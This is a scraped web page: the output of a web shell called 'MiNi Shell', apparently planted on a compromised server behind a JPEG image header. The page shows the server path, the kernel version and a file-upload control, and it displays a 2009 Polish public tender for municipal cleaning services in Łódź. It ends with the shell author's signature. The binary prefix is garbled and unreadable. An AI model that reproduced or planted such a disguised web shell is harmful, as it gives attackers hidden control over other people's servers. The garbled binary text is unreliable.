JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090428/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090428/67715-N-2009.html

<p class="kh_header"><b>Łódź: Usługi w zakresie: utrzymania w należytym stanie sanitarno - porządkowym powierzchni wewnętrznych nieruchomości  oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości.</b><br>
<b>Numer ogłoszenia: 67715 - 2009; data zamieszczenia: 28.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Nieruchomościami Łódź-Górna "Wschód" , ul. Lubelska 9/11/8, 93-129 Łódź, woj. łódzkie, tel. 042 6847601, faks 042 6847576.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> anwschod.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie: utrzymania w należytym stanie sanitarno - porządkowym powierzchni wewnętrznych nieruchomości  oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1/ Przedmiotem zamówienia są usługi związane z kompleksowym sprzątaniem      
    nieruchomości i terenów do nich przynależnych niezabudowanych oraz zielonych 
    administrowanych przez Zamawiającego ujętych w trzech częściach 
    (zadaniach):
część I - zadanie nr 1 (zał. do SIWZ nr 1a)    
                   pow. wew. nieruchomości              -      6 224,00 m2
                   tereny zew. niezabudowane           -    41 839,20 m2  
	      tereny zielone                              -    18 218,92 m2    
część II - zadanie nr 2  (zał. do SIWZ  nr 1b)  
                   pow. wew. nieruchomości               -    5 966,60 m2
                   tereny zew. niezabudowane             -  26 181,00 m2  
	      tereny zielone                                   -    8 070,00 m2  
część III - zadanie nr 3 (zał. do SIWZ nr 1c)  
                   pow. wew. nieruchomości                -   35 542,00 m2
                   tereny zew. niezabudowane              -   75 110,00 m2  
	       tereny zielone                                -   17 271,00 m2   
w zakresie:
a) utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych 
    nieruchomości w tym: 
  - biegi i podesty klatek schodowych, korytarze, wc-ogólne - codzienne sprzątanie 
    wraz z usuwaniem kurzu i pajęczyn,  mycie jeden raz w tygodniu,
  - drzwi wejściowe do budynków - mycie jeden raz w miesiącu,
  - okna na klatkach schodowych, w pralniach i w suszarniach - mycie dwa razy w    
    roku co sześć miesięcy,
  - pralnie i suszarnie - sprzątanie jeden raz w m-cu, 
  - korytarze, strychy i piwnice - usuwanie odpadów wielkogabarytowych  w miejsce    
    składowania pojemników na odpady komunalne na nieruchomości 
    (według potrzeb - częstotliwość i ilość gabarytów  trudna do określenia  uzależniona 
    od prac remontowych wykonywanych przez najemców lokali). Zamawiający nie 
    posiada żadnej wiedzy o usuniętych odpadach  wielkogabarytowych w latach 
    ubiegłych.
b) utrzymania w należytym stanie sanitarno-porządkowym niezabudowanych  
    powierzchni przynależnych do nieruchomości oraz tarasów i schodów 
    pawilonów w tym:
  - obszar chodników, studzienek ściekowych, dojść do budynków mieszkalnych i 
    gospodarczych zbiorowego użytku, tarasów i schodów pawilonów - codzienne 
    sprzątanie, a - w okresie zimowym codzienne usuwanie skutków zimy  - opad śniegu, 
    gołoledź (użyty piasek należy niezwłocznie usunąć po ustaniu gołoledzi - koszt 
    dostawy piasku do posypywania obciąża Wykonawcę),
  - tarasy i schody pawilonów w okresie od m-ca IV do m-ca X (dot: zadania 2 poz. 19 
    tj Dąbrowskiego 91 -192,11 m2, Dąbrowskiego 91a  - 194,85 m2, Dąbrowskiego 91b 
    - 194,74 m2 - wymienione powierzchnie zostały uwzględnione w powierzchni 
    zewnętrznej)- mycie jeden raz na tydzień, 
c) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych  
    przynależnych do nieruchomości - w okresie wegetacji od m-ca IV do m-ca X:
   - sprzątanie śmieci - codziennie,
   - pokos traw (koszenie) - jeden raz w miesiącu,
   - grabienie skoszonej trawy, opadłych liści, usuwanie leżących gałezi wraz z ich 
     wywozem i utylizacją  przy użyciu własnego transportu i na koszt własny - 
     sukcesywnie i niezwłocznie do uzyskania czystości na terenach zielonych 
     (częstotliwość i wielkość niemożliwa do określenia uzależniona od warunków 
     atmosferycznych niezależnych od Zamawiającego),
   - miejscowe usuwanie powstałych przedeptów poprzez dosianie traw 
     (wielkość trudna do określenia przez Zamawiającego, uzależniona od dokonanych 
     zniszczeń przez przechodniów)- koszt nasiona trawy obciąza Wykonawcę, 
d) utrzymania w należytym stanie sanitarno-porządkowym terenów zielonych  
    przynależnych do nieruchomości - po okresie wegetacji od m-ca XI do m-ca III:
  - sprzątanie śmieci - codziennie,
  - grabienie opadłych liści, usuwanie leżących gałezi wraz z ich wywozem i utylizacją 
    przy użyciu własnego transportu i na koszt własny - sukcesywnie i niezwłocznie do 
    uzyskania czystości na terenach zielonych (częstotliwość i wielkość niemożliwa do 
    określenia uzależniona od warunków atmosferycznych niezależnych od 
    Zamawiającego),
e) nadzorowania właściwego opróżniania pojemników na odpady oraz ich 
    ustawiania w miejscach do tego przeznaczonych oraz nadzoru nad terminowym 
    wywozem odpadów wielkogabarytowych złożonych w tych miejscach,
f) zamieszczania ogłoszeń i informacji dla lokatorów w budynkach w miejscach 
    wyznaczonych, 
g) wymiany przepalonych żarówek  w nieruchomościach - koszt żarówek obciąża 
    Wykonawcę, (Zamawiający nie posiada żadnej wiedzy o ilości wymienionych 
    żarówek w latach ubiegłych),
h) obowiązkowego wywieszania flag w nieruchomościach - zgodnie z określonym 
    poniżej harmonogramem tj.
    flaga państwowa
    1 maja -  Święto Pracy, 
    2 maja -  Dzień Flagi Rzeczypospolitej Polskiej,
    3 maja -  Święto Narodowe Trzeciego Maja,
    9 maja  - Święto Narodowe Zwycięstwa i Wolności,
  15 sierpnia - Dzień Wojska Polskiego, 
  31 sierpnia - Dzień Solidarności i Wolności,
    1 września  -  rocznica wybuchu II wojny światowej oraz Dzień Weterana,
  11 listopada - Narodowe Świeto Niepodległości,
  flaga miasta
  19 stycznia - rocznica wyzwolenia więzienia na Radogoszczu,
  15 maja - Święto Miasta,
  13 czerwca - rocznica wizyty Ojca Świetego Jana Pawła II,
    5 października - rocznica ustanowienia Świętej Faustyny Kowalskiej patronką Łodzi,
  flaga papieska   
  13 czerwca - rocznica wizyty Ojca Świetego Jana Pawła II,
  16 czerwca - Dzień Papieża Jana Pawła II,
   Flagę państwową, miejską i papieską podnosi się nie wcześniej niż w dniu 
   poprzedzającym święta i rocznice, a opuszcza się nie później niż w dniu bezpośrednio 
   następującym po dniu, w którym przypada świętolub rocznica jak również  na każde 
   dodatkowe żądanie Zamawiającego - koszt flag obciąża Wykonawcę.
i) usuwania na bieżąco plakatów i ogłoszeń z elewacji, słupów i innych miejsc do tego 
   nieprzeznaczonych,
j) zgłaszania Zamawiającemu zaistniałych zagrożeń (np.nawisy śniegowe, sople 
   lodowe, uszkodzenia instalacji elektrycznej, uszkodzenia elewacji zagrażające 
   bezpieczeństwu ludzi);
k)  opróżniania i sprzątania lokali mieszkalnych i użytkowych zwalnianych w wyniku 
     zgonów lub eksmisji - za odrębnym zleceniem w terminie 14 dni od dnia otrzymania 
     zlecenia od Zamawiającego;
l)  wykonywania eksmisji do lokalu wskazanego przez Zamawiającego z wyniesieniem 
     ruchomości, transportem i wniesieniem ruchomości - za odrębnym zleceniem w 
     terminie uzgodnionym przez Zamawiającego,
ł)  wymiany po okresie zimowym jeden raz w roku piasku w piaskownicach (środkiem 
     transportu o ład. do 5,0 ton - dot: zad. 2 i 3 - dla jednej piaskownicy należy przyjąć 
     5,0 ton piasku) znajdujących się na terenach objętych zamówieniem - koszt obciąża 
     Wykonawcę, a także (dotyczy: wszystkich zadań, również zadania nr 1, w którym 
     nie występuje piaskownica) każdorazowo w przypadku stwierdzenia 
     zanieczyszczenia piasku odchodami zwierzęcymi lub innymi zanieczyszczeniami 
     zagrażającymi bezpieczeństwu korzystających - za odrębnym zleceniem w terminie 
     uzgodnionym przez Zamawiającego,
m) wykonywania czynności porządkowych i pomocniczych (np. przenoszenie mebli na 
      rzecz Zamawiającego) - za odrębnym zleceniem w terminie uzgodnionym przez 
      Zamawiającego,
   Czynności wymienione powyżej Wykonawca będzie wykonywał przy pomocy 
    własnych pracowników i materiałów (flagi, piasek do piaskownic oraz do 
    posypywania chodników w okresie zimy, żarówki, środki czystościowe do mycia, 
    nasiona traw, własnych narzędzi i sprzętu (łopaty do śniegu, odkuwacze do lodu, 
    kosiarki, podkaszarki, grabie, sekatory piły, miotły, szczotki, ścierki i tym podobne) 
    oraz własnego transportu (samochód ciężarowy, ciągnik).
2/ W ramach zamówienia Wykonawca zobowiązany będzie do wykonywania   
    czynności objętych zamówieniem z wyżej opisaną częstotliwością, która winna 
    gwarantować: 
a) odpowiedni stan sanitarno-porządkowy posesji; 
b) odpowiedni stan bezpieczeństwa pożarowego posesji (opróźnianie strychów, 
    korytarzy i piwnic z przedmiotów stwarzających zagrożenie);
c) odpowiedni stan porządkowy terenów przynależnych niezabudowanych, tarasów i 
    schodów pawilonów - także w zakresie zabezpieczenia od skutków oblodzeń i 
    opadów śniegu (w okresie zimowym Zamawiający będzie wymagał 
    natychmiastowego przystąpienia do usuwania skutków zimy w przypadku zaistnienia 
    intensywnych opadów śniegu lub wystąpienia gołoledzi);
d) odpowiedni stan estetyczny terenów zielonych przynależnych do posesji; 
3/  Wykonawca zobowiązany jest do posiadania aktualnej umowy z kompostownią..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Zgodnie z art. 22 Ustawy, o udzielenie zamówienia mogą się ubiegać Wykonawcy,  
    którzy spełniają następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności,     
    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem 
    technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią 
    pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
    technicznego i osób zdolnych do wykonania zamówienia; 
 c) znajdują sie w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
     zamówienia; 
 d) nie podlegają wykluczeniu z postępowania, zgodnie z art.24 ustawy Pzp;
2. Zamawiający ustala następujące szczegółowe warunki udziału w postępowaniu:
 a) w zakresie warunku wskazanego w punkcie 1a, i 1d wymagane jest prowadzenie  
    działalności gospodarczej zgodnej z przedmiotem zamówienia, który należy 
    potwierdzić dokumentami i oświadczeniami. Ocena spełnienia w/w warunku 
    /spełnia, nie spełnia/ nastąpi na podstawie załączonych przez każdego    
    z Wykonawców dokumentów i oświadczeń, o których mowa w punkcie V.
 b) w zakresie warunku wskazanego w punkcie 1b, każdy Wykonawca powinien złożyć 
     oświadczenie, że posiada niezbędną wiedzę i doświadczenie oraz potencjał 
      technicny, a także dysponuje osobami zdolnymi do wykonania zamówienia lub 
      przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
     technicznego i osób zdolnych do wykonania zamówienia oraz dokumenty, które  
     potwierdzają spełnienie tego warunku. Ocena spełnienia w/w warunku 
     /spełnia, nie spełnia/ nastąpi na podstawie załączonych przez każdego 
    z Wykonawców dokumentów i oświadczeń, o których mowa w punkcie V.
 c) w zakresie warunku wskazanego w punkcie 1c, każdy Wykonawca powinien złożyć 
     oświadczenie, że znajduje sie w sytuacji ekonomicznej i finansowej zapewniającej 
     wykonanie zamówienia oraz dokumenty, które potwierdzają spełnienie tego 
     warunku. Ocena spełnienia w/w warunku  /spełnia, nie spełnia/ nastąpi na podstawie 
     załączonych przez każdego z Wykonawców dokumentów i oświadczeń, o których 
     mowa w punkcie V..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków udziału w postępowaniu, każdy z 
     Wykonawców powinien przedłożyć wraz z ofertą następujace oświadczenia i 
      dokumenty: 
1.1.Warunki szczegółowe określone w punkcie IV 2a SIWZ - do ofert należy 
       załączyć:
   a/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed 
       upływem terminu składania ofert;
   b/ aktualną umowę z kompostownią, która będzie przyjmować odpady: liście i        
       skoszone trawy;
   c/ aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego    
       potwierdzające, że Wykonawca nie zalega z opłaceniem podatków, opłat lub        
       zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie  lub    
       rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania    
       decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed 
       upływem terminu składania ofert;
   d/ aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń 
       Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że 
       Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub    
        społeczne lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, 
        odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości 
        wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 
        miesiące przed upływem terminu składania ofert;
    e/ w przypadku składania oferty przez podmioty występujące wspólnie, dokumenty 
        wyszczególnione w punkcie V.1.1. muszą być zlożone przez każdy podmiot;
1.2. Warunki szczegółowe określone w punkcie IV 2b SIWZ - do ofert należy załączyć:
    a/ wykaz wykonanych w okresie ostatnich trzech lat usług (także rezlizowanych   
        bieżąco) w ilości: w przypadku składania oferty na trzy części co najmniej 
        trzech usług w okresie 12 m-cy o wartości min. 650.000,00 zł brutto - w tym:  
 - dla części I (zadania nr 1) - min. jednej o wartości 150.000,00 zł brutto,
 - dla części II (zadania nr 2) - min. jednej o wartosci 100,000,00 zł brutto,
 - dla części III (zadania nr 3) - min. jednej o wartosci 400,000,00 zł brutto,
    ze szczególnym uwzględnieniem usług świadczonych na rzecz podmiotów 
    prowadzących działalność zbliżoną do działalności Zamawiającego, a jeżeli okres 
    działalności jest krótszy - w tym okresie, z podaniem wartości, przedmiotu, dat 
    wykonania i odbiorców usług - zał.nr 3 do SIWZ; 
b/ zaświadczenie podmiotu uprawnionego do kontroli jakości, potwierdzające, iż 
    Wykonawca spełnia określone wymogi jakościowe w zakresie świadczenia usług 
     sprzątania będących przedmiotem zamówienia lub równoważne dokumenty 
     potwierdzające jakość świadczonych usług wykazanych w załączniku nr 3 do 
     SIWZ;
 c/ wykaz niezbędnych do wykonania narzędzi i sprzętu jakie posiada Wykonawca: 
     (co najmniej:jeden samochód ciężarowy o ładowności powyżej 0,9 t lub jeden 
     ciągnik rolniczy z przyczepą, pięć kosiarek spalinowych, trzy podkaszarki)- zał.
     nr 5 do SIWZ;
     d/ oświadczenie Wykonawcy, że dla zapewnienia utrzymania należytego stanu 
         sanitarno - porządkowego nieruchomości i terenów przynależnych do 
         nieruchomości będzie dysponował:
  - dla części I (zadania nr 1) - minimum 8 osobami,
  - dla części II (zadania nr 2) - minimum 6 osobami,
  - dla części III (zadania nr 3) - minimum 17 osobami,
         zał. nr 4 do SIWZ;
     e/ oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, o którym    
         mowa w art.22 ust. 1 i art 24 ustawy - zał. nr 4 do SIWZ;
     f/ w przypadku składania oferty przez podmioty występujące wspólnie, dokumenty 
         wyszczególnione w punkcie V.1.2 e. muszą być złożone przez każdy podmiot;
 

1.3. Warunki szczegółowe określone w punkcie IV 2c SIWZ - do ofert należy 
        załączyć:
     a/ polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest 
        ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności      
        gospodarczej na kwotę nie mniej niż 100 000,00 zł, w przypadku załączenia   
        dokumentu na okres krótszy, do oferty należy dołączyć zobowiązanie o 
        przedłużeniu ważności ubezpieczenia,      
    b/ oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, o którym 
        mowa w art.22 ust. 1 i art 24 ustawy - zał. nr 4 do SIWZ;
    c/ w przypadku składania oferty przez podmioty występujące wspólnie, dokumenty 
        wyszczególnione w punkcie V.1.3 b. muszą być złożone przez każdy podmiot;.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.anwschod.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Administracja Nieruchomościami Łodź -Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pokój 31 od poniedziałku do piątku w godzinach 9:30-14:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2009 godzina 10:00, miejsce: Administracja Nieruchomościami Łodź -Górna Wschód 93-129 Łódź ul. Lubelska 9/11 pokój 31..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie w należytym stanie sanitarno - porządkowym powierzchni wewnętrznych nieruchomości oraz terenów przynależnch niezabudowanych i zielonych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie: utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych oraz zielonych przynależnych do nieruchomości administrowanych przez Zamawiającego ujęte w części I (zadanie nr 1) stanowiącej załącznik do specyfikacji istotnych warunków zamówienia nr 1a,
część I - zadanie nr 1 (zał. do SIWZ nr 1a)   
                   pow. wew. nieruchomości               -     6 224,00 m2
                   tereny zew. niezabudowane            -    41 839,20 m2  
	      tereny zielone                                  -   18 218,92 m2    
                                                ogółem:              -    66 282,12 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Utrzymanie w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie: utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości administrowanych przez Zamawiającego ujęte w części II (zadanie nr 2) stanowiącej załącznik do specyfikacji istotnych warunków zamówienia nr 1b,
część I I- zadanie nr 2 (zał. do SIWZ nr 1b)   
                   pow. wew. nieruchomości               -     5 966,60 m2
                   tereny zew. niezabudowane            -    26 181,00 m2  
	      tereny zielone                                -    8 070,00 m2    
                                                ogółem:           -   40 217,60 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Utrzymanie w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługi w zakresie: utrzymania w należytym stanie sanitarno-porządkowym powierzchni wewnętrznych nieruchomości oraz terenów niezabudowanych i zielonych przynależnych do nieruchomości administrowanych przez Zamawiającego ujęte w części III (zadanie nr 3) stanowiącej załącznik do specyfikacji istotnych warunków zamówienia nr 1c,
część III - zadanie nr 3 (zał. do SIWZ nr 1c)   
                   pow. wew. nieruchomości               -    35 542,00 m2
                   tereny zew. niezabudowane            -    75 110,00 m2  
	      tereny zielone                                -   17 271,00 m2    
                                                ogółem:           -  127 923,00 m2.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 77.31.00.00-6, 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com